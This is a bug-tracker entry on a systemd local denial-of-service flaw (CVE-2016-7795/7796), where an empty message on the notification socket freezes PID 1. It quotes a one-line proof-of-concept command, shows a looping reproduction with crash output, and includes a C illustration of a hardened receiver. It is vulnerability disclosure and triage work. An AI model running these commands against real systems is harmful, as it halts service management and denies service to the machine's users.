Bug 32545 - CVE-2016-7795, CVE-2016-7796: systemd: local denial-of-service attack via notification socket
Status: NEW
Product: ALT Linux Centaurus (All bugs in ALT Linux Centaurus)
Component: Operational errors (Ошибки работы)
Version: not specified
Platform: all Linux
Priority/Severity: P3 normal
Reported: 2016-09-29 18:50
Modified: 2016-09-30 15:59
Description From 2016-09-29 18:50:43
Source: http://seclists.org/oss-sec/2016/q3/641

====================
systemd[1] fails an assertion in manager_invoke_notify_message[2] when
a zero-length message is received over its notification socket.
After failing the assertion, PID 1 hangs in the pause system call.
It is no longer possible to start and stop daemons or cleanly reboot
the system. Inetd-style services managed by systemd no longer accept
connections.

Since the notification socket, /run/systemd/notify, is world-writable,
this allows a local user to perform a denial-of-service attack against
systemd.

Proof-of-concept:

        NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""

This vulnerability is present in all versions of systemd since at
least v209[3].

This has been reported to systemd.[4]

[1] https://github.com/systemd/systemd/
[2] https://github.com/systemd/systemd/blob/b8fafaf4a1cffd02389d61ed92ca7acb1b8c739c/src/core/manager.c#L1666
[3] https://github.com/systemd/systemd/commit/5ba6985b6c8ef85a8bcfeb1b65239c863436e75b#diff-ab78220e12703ee63fa1e6a2caa16bebR1325
[4] https://github.com/systemd/systemd/issues/4234
====================

Since upstream systemd supports only the release branch (232) and the two
previous releases (231, 230), the systemd version(s) used in ALT Linux products
need to be checked and, where necessary, fixed. The comments on [4] contain a
more complete PoC that reproduces the problem.

No CVE has been assigned yet, but judging by the priority assigned in the
openSUSE bug tracker (https://bugzilla.suse.com/show_bug.cgi?id=1001765), the
bug is fairly serious and needs to be fixed promptly. The problem has already
been fixed upstream.
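The mechanism described in the quoted report, as an added example that is not part of the original bug report or of systemd's source: a minimal C model of a notification-socket receiver. It uses an AF_UNIX SOCK_DGRAM socketpair() in place of /run/systemd/notify (an assumption so it runs offline), and a handler that returns on a zero-length datagram where the vulnerable code asserted; the function names and the sample burst are constructed for this illustration and are not systemd's. It shows that a zero-byte send() on a datagram socket is a legal message that arrives as recv() == 0 (what `systemd-notify ""` produces), and that a receiver which treats n == 0 as untrusted, ignorable input keeps processing the legitimate notifications interleaved with hostile empty ones, whereas an assertion on n > 0 aborts the process on the first one.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Outcome of processing one datagram read from the notification socket. */
enum notify_result {
        NOTIFY_IGNORED_EMPTY = 0, /* zero-length datagram: dropped, not fatal */
        NOTIFY_HANDLED,           /* non-empty payload: would be parsed as KEY=VALUE lines */
        NOTIFY_ERROR              /* socket or recv() failure */
};

/*
 * Illustrative receiver (not systemd's code). The vulnerable pattern is an
 * assertion on the received length (n > 0) that any local user can falsify
 * by sending an empty datagram to a world-writable socket; in PID 1 a failed
 * assertion aborts the manager. The hardened version treats n == 0 as an
 * input condition and simply returns.
 */
enum notify_result handle_notify_message(const char *buf, ssize_t n)
{
        if (n < 0)
                return NOTIFY_ERROR;
        if (n == 0)
                return NOTIFY_IGNORED_EMPTY; /* vulnerable code: assert(n > 0) here */
        (void)buf; /* real receiver parses buf[0..n) as newline-separated KEY=VALUE */
        return NOTIFY_HANDLED;
}

/*
 * Deliver one datagram over a SOCK_DGRAM socketpair standing in for
 * /run/systemd/notify and run the handler on what the receiver gets.
 * A zero-length send() is legal on a datagram socket and arrives as
 * recv() == 0; it is not an end-of-stream indication.
 */
enum notify_result deliver_and_handle(const void *payload, size_t len)
{
        int fds[2];
        char buf[4096];
        ssize_t n;
        enum notify_result r;

        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, fds) < 0)
                return NOTIFY_ERROR;
        if (send(fds[0], payload, len, 0) < 0) {
                close(fds[0]);
                close(fds[1]);
                return NOTIFY_ERROR;
        }
        n = recv(fds[1], buf, sizeof(buf), MSG_DONTWAIT); /* datagram is already queued */
        r = handle_notify_message(buf, n);
        close(fds[0]);
        close(fds[1]);
        return r;
}

/* Feed a burst of messages; return how many were handled, count the empties. */
size_t process_burst(const char *const *msgs, size_t count, size_t *ignored)
{
        size_t handled = 0;
        *ignored = 0;
        for (size_t i = 0; i < count; i++) {
                switch (deliver_and_handle(msgs[i], strlen(msgs[i]))) {
                case NOTIFY_HANDLED:       handled++;    break;
                case NOTIFY_IGNORED_EMPTY: (*ignored)++; break;
                default:                                 break;
                }
        }
        return handled;
}

/* Constructed sample: hostile empty datagrams interleaved with legitimate
 * sd_notify() traffic. With the hardened handler both READY=1 and STATUS=
 * are processed; the asserting receiver would never get past the first "". */
size_t demo_burst(size_t *ignored)
{
        const char *const burst[] = { "", "READY=1\n", "", "STATUS=Up\n", "" };
        return process_burst(burst, sizeof(burst) / sizeof(burst[0]), ignored);
}

int main(void)
{
        size_t ignored = 0;
        size_t handled = demo_burst(&ignored);
        printf("handled=%zu ignored=%zu\n", handled, ignored);
        return 0;
}
```

The socketpair() keeps the demonstration in-process; against a real manager the same empty datagram goes through the path-bound socket, which is why the socket's mode matters as much as the receiver's length check.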
------- Comment #1 From 2016-09-30 11:13:19 -------
Assigned CVEs: CVE-2016-7795, CVE-2016-7796. Source:
http://seclists.org/oss-sec/2016/q3/675
------- Comment #2 From 2016-09-30 15:05:28 -------
Results on a virtual machine:

As root:

$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done >systemdlog

Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30 14:36:54 MSK):

systemd[1]: Caught <ABRT>, dumped core as pid 1594.


Broadcast message from systemd-journald@host-15.localdomain (Fri 2016-09-30 14:36:54 MSK):

systemd[1]: Freezing execution.

Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused


Services can no longer be started:

$ service sshd start
Failed to start sshd.service: Failed to activate service 'org.freedesktop.systemd1': timed out
See system logs and 'systemctl status sshd.service' for details.

As an ordinary user:

$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done >systemdlog
bash: systemdlog: Permission denied

systemctl version:
$ systemctl --version
systemd 230
+PAM +AUDIT +SELINUX -IMA -APPARMOR -SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP
+GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN

ALT Linux version:
$ uname -a
Linux host-15.localdomain 4.4.16-std-def-alt0.M80P.1 #1 SMP Thu Jul 28 03:44:48 UTC 2016 x86_64 GNU/Linux